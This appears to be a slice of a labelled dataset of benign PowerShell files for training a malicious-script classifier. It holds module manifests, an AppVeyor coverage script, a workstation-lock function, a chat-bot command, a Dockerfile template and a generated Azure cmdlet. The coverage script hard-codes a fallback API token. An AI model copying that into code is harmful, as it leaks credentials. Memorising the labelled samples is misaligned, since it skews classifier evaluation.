URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/3152.ps1
3152.ps1
Install-Module Coveralls -MinimumVersion 1.0.25 -Scope CurrentUser -Force -ErrorAction Stop Import-Module Coveralls -Force -ErrorAction Stop $coverageSet = @('Helpers\PoshGit.ps1','Helpers\Prompt.ps1') $res = Invoke-Pester -CodeCoverage $coverageSet -OutputFormat NUnitXml -OutputFile TestsResults.xml -PassThru -EnableExit (New-Object 'System.Net.WebClient').UploadFile("https://ci.appveyor.com/api/testresults/nunit/$($env:APPVEYOR_JOB_ID)", (Resolve-Path .\TestsResults.xml)) if (!$ENV:CA_KEY) { $ENV:CA_KEY = "14mb4l0n1" } $coverageResult = Format-Coverage -PesterResults $res -CoverallsApiToken $ENV:CA_KEY -BranchName $ENV:APPVEYOR_REPO_BRANCH Publish-Coverage -Coverage $coverageResult
combined_dataset/train/non-malicious/sample_23_71.ps1
sample_23_71.ps1
# # Module manifest for module 'OCI.PSModules.Ailanguage' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Ailanguage.dll' # Version number of this module. ModuleVersion = '74.1.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'f9edfadc-7cd9-4f7a-8258-fc0671fb808f' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Ailanguage Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '74.1.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Ailanguage.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIAilanguageEndpoint', 'Get-OCIAilanguageEndpointsList', 'Get-OCIAilanguageEvaluationResultsList', 'Get-OCIAilanguageModel', 'Get-OCIAilanguageModelsList', 'Get-OCIAilanguageModelType', 'Get-OCIAilanguageProject', 'Get-OCIAilanguageProjectsList', 'Get-OCIAilanguageWorkRequest', 'Get-OCIAilanguageWorkRequestErrorsList', 'Get-OCIAilanguageWorkRequestLogsList', 'Get-OCIAilanguageWorkRequestsList', 'Invoke-OCIAilanguageBatchDetectDominantLanguage', 'Invoke-OCIAilanguageBatchDetectLanguageEntities', 'Invoke-OCIAilanguageBatchDetectLanguageKeyPhrases', 'Invoke-OCIAilanguageBatchDetectLanguagePiiEntities', 'Invoke-OCIAilanguageBatchDetectLanguageSentiments', 'Invoke-OCIAilanguageBatchDetectLanguageTextClassification', 'Invoke-OCIAilanguageBatchLanguageTranslation', 'Invoke-OCIAilanguageDetectDominantLanguage', 'Invoke-OCIAilanguageDetectLanguageEntities', 'Invoke-OCIAilanguageDetectLanguageKeyPhrases', 'Invoke-OCIAilanguageDetectLanguageSentiments', 'Invoke-OCIAilanguageDetectLanguageTextClassification', 'Move-OCIAilanguageEndpointCompartment', 'Move-OCIAilanguageModelCompartment', 'Move-OCIAilanguageProjectCompartment', 'New-OCIAilanguageEndpoint', 'New-OCIAilanguageModel', 'New-OCIAilanguageProject', 'Remove-OCIAilanguageEndpoint', 'Remove-OCIAilanguageModel', 'Remove-OCIAilanguageProject', 'Update-OCIAilanguageEndpoint', 'Update-OCIAilanguageModel', 'Update-OCIAilanguageProject' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Ailanguage' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/Lock-WorkStation.ps1
Lock-WorkStation.ps1
Function Lock-WorkStation { $signature = @" [DllImport("user32.dll", SetLastError = true)] public static extern bool LockWorkStation(); "@ $LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru $LockWorkStation::LockWorkStation() | Out-Null }
combined_dataset/train/non-malicious/3318.ps1
3318.ps1
function Remove-GroupRole { [PoshBot.BotCommand( Permissions = 'manage-groups' )] [cmdletbinding()] param( [parameter(Mandatory)] $Bot, [parameter(Mandatory, Position = 0)] [string]$Group, [parameter(Mandatory, Position = 1)] [string]$Role ) if ($g = $Bot.RoleManager.GetGroup($Group)) { if ($r = $Bot.RoleManager.GetRole($Role)) { try { $bot.RoleManager.RemoveRoleFromGroup($Role, $Group) New-PoshBotCardResponse -Type Normal -Text "Role [$Role] removed from group [$Group]." -ThumbnailUrl $thumb.success } catch { New-PoshBotCardResponse -Type Error -Text "Failed to remove [$Role] from group [$Group]" -ThumbnailUrl $thumb.error } } else { New-PoshBotCardResponse -Type Warning -Text "Role [$Role] not found :(" -Title 'Rut row' -ThumbnailUrl $thumb.rutrow } } else { New-PoshBotCardResponse -Type Warning -Text "Group [$Group] not found :(" -Title 'Rut row' -ThumbnailUrl $thumb.rutrow } }
combined_dataset/train/non-malicious/sample_48_26.ps1
sample_48_26.ps1
#See https://aka.ms/customizecontainer to learn how to customize your debug container and how Visual Studio uses this Dockerfile to build your images for faster debugging. #Depending on the operating system of the host machines(s) that will build or run the containers, the image specified in the FROM statement may need to be changed. #For more information, please see https://aka.ms/containercompat FROM $base_image_name$ AS base WORKDIR /app FROM $sdk_image_name$ AS build # Install Visual Studio Build Tools, they are required for aot publish # Note: Use of the Visual Studio Build Tools requires a valid Visual Studio license. RUN curl -SL --output vs_buildtools.exe https://aka.ms/vs/17/release/vs_buildtools.exe RUN vs_buildtools.exe --installPath C:\BuildTools --add Microsoft.VisualStudio.Component.VC.Tools.x86.x64 Microsoft.VisualStudio.Component.Windows10SDK.19041 --quiet --wait --norestart --nocache ARG BUILD_CONFIGURATION=Release WORKDIR /src $copy_build_file_commands$$copy_project_commands$ RUN dotnet restore "$project_relative_path$" COPY . . WORKDIR "/src/$container_project_directory$" RUN dotnet build "$project_file_name$" -c %BUILD_CONFIGURATION% -o /app/build FROM build AS publish ARG BUILD_CONFIGURATION=Release RUN dotnet publish "$project_file_name$" -c %BUILD_CONFIGURATION% -o /app/publish /p:UseAppHost=true FROM $final_base_image_name$ AS final WORKDIR /app COPY --from=publish /app/publish . ENTRYPOINT ["dotnet", "$assembly_name$.exe"]
combined_dataset/train/non-malicious/sample_28_5.ps1
sample_28_5.ps1
# ---------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code # is regenerated. # ---------------------------------------------------------------------------------- <# .Synopsis Creates or updates a project environment type. .Description Creates or updates a project environment type. .Example {{ Add code here }} .Example {{ Add code here }} .Inputs Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Models.Api20231001Preview.IProjectEnvironmentType .Inputs Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Models.IDevCenterIdentity .Outputs Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Models.Api20231001Preview.IProjectEnvironmentType .Notes COMPLEX PARAMETER PROPERTIES To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables. BODY <IProjectEnvironmentType>: Represents an environment type. [SystemDataCreatedAt <DateTime?>]: The timestamp of resource creation (UTC). [SystemDataCreatedBy <String>]: The identity that created the resource. [SystemDataCreatedByType <CreatedByType?>]: The type of identity that created the resource. [SystemDataLastModifiedAt <DateTime?>]: The timestamp of resource last modification (UTC) [SystemDataLastModifiedBy <String>]: The identity that last modified the resource. [SystemDataLastModifiedByType <CreatedByType?>]: The type of identity that last modified the resource. [CreatorRoleAssignmentRole <IProjectEnvironmentTypeUpdatePropertiesCreatorRoleAssignmentRoles>]: A map of roles to assign to the environment creator. [(Any) <IEnvironmentRole>]: This indicates any property can be added to this object. [DeploymentTargetId <String>]: Id of a subscription that the environment type will be mapped to. The environment's resources will be deployed into this subscription. [IdentityType <ManagedServiceIdentityType?>]: Type of managed service identity (where both SystemAssigned and UserAssigned types are allowed). [IdentityUserAssignedIdentity <IUserAssignedIdentities>]: The set of user assigned identities associated with the resource. The userAssignedIdentities dictionary keys will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}. The dictionary values can be empty objects ({}) in requests. [(Any) <IUserAssignedIdentity>]: This indicates any property can be added to this object. [Location <String>]: The geo-location for the environment type [Status <EnvironmentTypeEnableStatus?>]: Defines whether this Environment Type can be used in this Project. [Tag <ITags>]: Resource tags. [(Any) <String>]: This indicates any property can be added to this object. [UserRoleAssignment <IProjectEnvironmentTypeUpdatePropertiesUserRoleAssignments>]: Role Assignments created on environment backing resources. This is a mapping from a user object ID to an object of role definition IDs. [(Any) <IUserRoleAssignmentValue>]: This indicates any property can be added to this object. INPUTOBJECT <IDevCenterIdentity>: Identity Parameter [AttachedNetworkConnectionName <String>]: The name of the attached NetworkConnection. [CatalogName <String>]: The name of the Catalog. [DevBoxDefinitionName <String>]: The name of the Dev Box definition. [DevCenterName <String>]: The name of the devcenter. [EnvironmentTypeName <String>]: The name of the environment type. [GalleryName <String>]: The name of the gallery. [Id <String>]: Resource identity path [ImageName <String>]: The name of the image. [Location <String>]: The Azure region [NetworkConnectionName <String>]: Name of the Network Connection that can be applied to a Pool. [OperationId <String>]: The ID of an ongoing async operation [PoolName <String>]: Name of the pool. [ProjectName <String>]: The name of the project. [ResourceGroupName <String>]: The name of the resource group. The name is case insensitive. [ScheduleName <String>]: The name of the schedule that uniquely identifies it. [SubscriptionId <String>]: The ID of the target subscription. [VersionName <String>]: The version of the image. .Link https://learn.microsoft.com/powershell/module/az.devcenter/new-azdevcenteradminprojectenvironmenttype #> function New-AzDevCenterAdminProjectEnvironmentType { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Models.Api20231001Preview.IProjectEnvironmentType])] [CmdletBinding(DefaultParameterSetName='CreateExpanded', PositionalBinding=$false, SupportsShouldProcess, ConfirmImpact='Medium')] param( [Parameter(ParameterSetName='CreateExpanded', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Path')] [System.String] # The name of the environment type. ${EnvironmentTypeName}, [Parameter(ParameterSetName='CreateExpanded', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Path')] [System.String] # The name of the project. ${ProjectName}, [Parameter(ParameterSetName='CreateExpanded', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Path')] [System.String] # The name of the resource group. # The name is case insensitive. ${ResourceGroupName}, [Parameter(ParameterSetName='CreateExpanded')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')] [System.String] # The ID of the target subscription. ${SubscriptionId}, [Parameter(ParameterSetName='CreateViaIdentityExpanded', Mandatory, ValueFromPipeline)] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Models.IDevCenterIdentity] # Identity Parameter # To construct, see NOTES section for INPUTOBJECT properties and create a hash table. ${InputObject}, [Parameter(ParameterSetName='CreateExpanded')] [Parameter(ParameterSetName='CreateViaIdentityExpanded')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Models.Api20231001Preview.IProjectEnvironmentTypeUpdatePropertiesCreatorRoleAssignmentRoles]))] [System.Collections.Hashtable] # A map of roles to assign to the environment creator. ${CreatorRoleAssignmentRole}, [Parameter(ParameterSetName='CreateExpanded', Mandatory)] [Parameter(ParameterSetName='CreateViaIdentityExpanded', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Body')] [System.String] # Id of a subscription that the environment type will be mapped to. # The environment's resources will be deployed into this subscription. ${DeploymentTargetId}, [Parameter(ParameterSetName='CreateExpanded')] [Parameter(ParameterSetName='CreateViaIdentityExpanded')] [ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Support.ManagedServiceIdentityType])] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Support.ManagedServiceIdentityType] # Type of managed service identity (where both SystemAssigned and UserAssigned types are allowed). ${IdentityType}, [Parameter(ParameterSetName='CreateExpanded')] [Parameter(ParameterSetName='CreateViaIdentityExpanded')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Models.Api40.IUserAssignedIdentities]))] [System.Collections.Hashtable] # The set of user assigned identities associated with the resource. # The userAssignedIdentities dictionary keys will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}. # The dictionary values can be empty objects ({}) in requests. ${IdentityUserAssignedIdentity}, [Parameter(ParameterSetName='CreateExpanded')] [Parameter(ParameterSetName='CreateViaIdentityExpanded')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Body')] [System.String] # The geo-location for the environment type ${Location}, [Parameter(ParameterSetName='CreateExpanded', Mandatory)] [Parameter(ParameterSetName='CreateViaIdentityExpanded', Mandatory)] [ArgumentCompleter([Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Support.EnvironmentTypeEnableStatus])] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Support.EnvironmentTypeEnableStatus] # Defines whether this Environment Type can be used in this Project. ${Status}, [Parameter(ParameterSetName='CreateExpanded')] [Parameter(ParameterSetName='CreateViaIdentityExpanded')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Models.Api20231001Preview.ITags]))] [System.Collections.Hashtable] # Resource tags. ${Tag}, [Parameter(ParameterSetName='CreateExpanded')] [Parameter(ParameterSetName='CreateViaIdentityExpanded')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Body')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Runtime.Info(PossibleTypes=([Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Models.Api20231001Preview.IProjectEnvironmentTypeUpdatePropertiesUserRoleAssignments]))] [System.Collections.Hashtable] # Role Assignments created on environment backing resources. # This is a mapping from a user object ID to an object of role definition IDs. ${UserRoleAssignment}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Azure')] [System.Management.Automation.PSObject] # The DefaultProfile parameter is not functional. # Use the SubscriptionId parameter when available if executing the cmdlet against a different subscription. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.DevCenter.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) process { Az.DevCenter.internal\New-AzDevCenterAdminProjectEnvironmentType @PSBoundParameters } } # SIG # Begin signature block # MIInzgYJKoZIhvcNAQcCoIInvzCCJ7sCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCD6UwQt7YQ4jgh+ # iIwmwJfOBe/eH1eYt1D34TMpUo8U5KCCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # 